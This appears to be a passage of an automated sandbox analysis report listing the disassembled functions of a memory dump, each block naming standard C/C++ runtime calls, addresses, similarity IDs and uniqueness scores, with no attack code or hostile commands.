                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F716D
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7177
                                                                                                                          • int.LIBCPMT ref: 6E2F718E
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F71B1
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F71C8
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F71E8
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F71F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7202
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F720C
                                                                                                                          • int.LIBCPMT ref: 6E2F7223
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F7246
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F725D
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F727D
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F728A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1C08
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1C12
                                                                                                                          • int.LIBCPMT ref: 6E2F1C29
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1C63
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1C83
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1C90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7C7C
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7C86
                                                                                                                          • int.LIBCPMT ref: 6E2F7C9D
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7CD7
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7CF7
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7D04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7456
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7460
                                                                                                                          • int.LIBCPMT ref: 6E2F7477
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F74B1
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F74D1
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F74DE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F74EB
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F74F5
                                                                                                                          • int.LIBCPMT ref: 6E2F750C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7546
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7566
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7573
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7D11
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7D1B
                                                                                                                          • int.LIBCPMT ref: 6E2F7D32
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7D6C
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7D8C
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7D99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7580
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F758A
                                                                                                                          • int.LIBCPMT ref: 6E2F75A1
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F75DB
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F75FB
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7608
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7A28
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7A32
                                                                                                                          • int.LIBCPMT ref: 6E2F7A49
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7A83
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7AA3
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7AB0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1B73
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1B7D
                                                                                                                          • int.LIBCPMT ref: 6E2F1B94
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1BCE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1BEE
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1BFB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F73C1
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F73CB
                                                                                                                          • int.LIBCPMT ref: 6E2F73E2
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F741C
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F743C
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7449
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7BE7
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7BF1
                                                                                                                          • int.LIBCPMT ref: 6E2F7C08
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7C42
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7C62
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7C6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7869
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7873
                                                                                                                          • int.LIBCPMT ref: 6E2F788A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F78C4
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F78E4
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F78F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7993
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F799D
                                                                                                                          • int.LIBCPMT ref: 6E2F79B4
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F79EE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7A0E
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7A1B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • task.LIBCPMTD ref: 6E2E7352
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF95F
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF96B
                                                                                                                            • Part of subcall function 6E2EF8E0: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF980
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF998
                                                                                                                            • Part of subcall function 6E30E156: RaiseException.KERNEL32(E06D7363,00000001,00000003,6E30AF34,?,?,?,6E30AF34,?,6E376BD4), ref: 6E30E1B6
                                                                                                                          • task.LIBCPMTD ref: 6E2E73D2
                                                                                                                          • task.LIBCPMTD ref: 6E2E73E1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorExceptionRaise
                                                                                                                          • String ID: =Y.nDq6n$Dq6n
                                                                                                                          • API String ID: 2403370058-3119292408
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 2204710431-1686923651
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3033488037-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 6E33CEFD
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33CF0F
                                                                                                                          • _free.LIBCMT ref: 6E33CF21
                                                                                                                          • _free.LIBCMT ref: 6E33CF33
                                                                                                                          • _free.LIBCMT ref: 6E33CF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Smanip$task
                                                                                                                          • String ID: .
                                                                                                                          • API String ID: 1925983085-248832578
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2FDF6D
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F681A
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F6837
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocstr.LIBCPMT ref: 6E2F6854
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocchr.LIBCPMT ref: 6E2F6866
                                                                                                                            • Part of subcall function 6E2F67FA: _Maklocchr.LIBCPMT ref: 6E2F6879
                                                                                                                          • _Mpunct.LIBCPMT ref: 6E2FDFFA
                                                                                                                          • _Mpunct.LIBCPMT ref: 6E2FE014
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 2939335142-1686923651
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Mpunct$H_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 4281374311-1686923651
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1384045349-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                          • _free.LIBCMT ref: 6E32F2FB
                                                                                                                          • _free.LIBCMT ref: 6E32F331
                                                                                                                          • SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2283115069-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,?,6E318835,6E32F53A,?,?,6E2E565E,000008BB,6E37A0D4), ref: 6E32F3F5
                                                                                                                          • _free.LIBCMT ref: 6E32F452
                                                                                                                          • _free.LIBCMT ref: 6E32F488
                                                                                                                          • SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,?,?,6E318835,6E32F53A,?,?,6E2E565E,000008BB,6E37A0D4), ref: 6E32F493
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2283115069-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F039A
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03A6
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03B2
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03C1
                                                                                                                          • task.LIBCPMTD ref: 6E2EF87F
                                                                                                                          • task.LIBCPMTD ref: 6E2EF88B
                                                                                                                          • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF8A0
                                                                                                                          • task.LIBCPMTD ref: 6E2EF8B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520070614-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F039A
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03A6
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03B2
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03C1
                                                                                                                          • task.LIBCPMTD ref: 6E2EF95F
                                                                                                                          • task.LIBCPMTD ref: 6E2EF96B
                                                                                                                          • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF980
                                                                                                                          • task.LIBCPMTD ref: 6E2EF998
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520070614-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1E36
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1E43
                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E2F1E80
                                                                                                                            • Part of subcall function 6E2F0FAE: _Yarn.LIBCPMT ref: 6E2F0FCD
                                                                                                                            • Part of subcall function 6E2F0FAE: _Yarn.LIBCPMT ref: 6E2F0FF1
                                                                                                                          • std::exception::exception.LIBCMTD ref: 6E2F1EA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2425033533-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID: -
                                                                                                                          • API String ID: 269201875-2547889144
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F0170: _Max_value.LIBCPMTD ref: 6E2F019C
                                                                                                                            • Part of subcall function 6E2F0170: _Min_value.LIBCPMTD ref: 6E2F01C2
                                                                                                                          • allocator.LIBCONCRTD ref: 6E2EA798
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Max_valueMin_valueallocator
                                                                                                                          • String ID: 2t.n$2t.n
                                                                                                                          • API String ID: 2697025138-4282282858
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 6E327B2D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                          • String ID: pow
                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: swap
                                                                                                                          • String ID: Dq6n$Dq6n
                                                                                                                          • API String ID: 630424929-2865934346
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          APIs
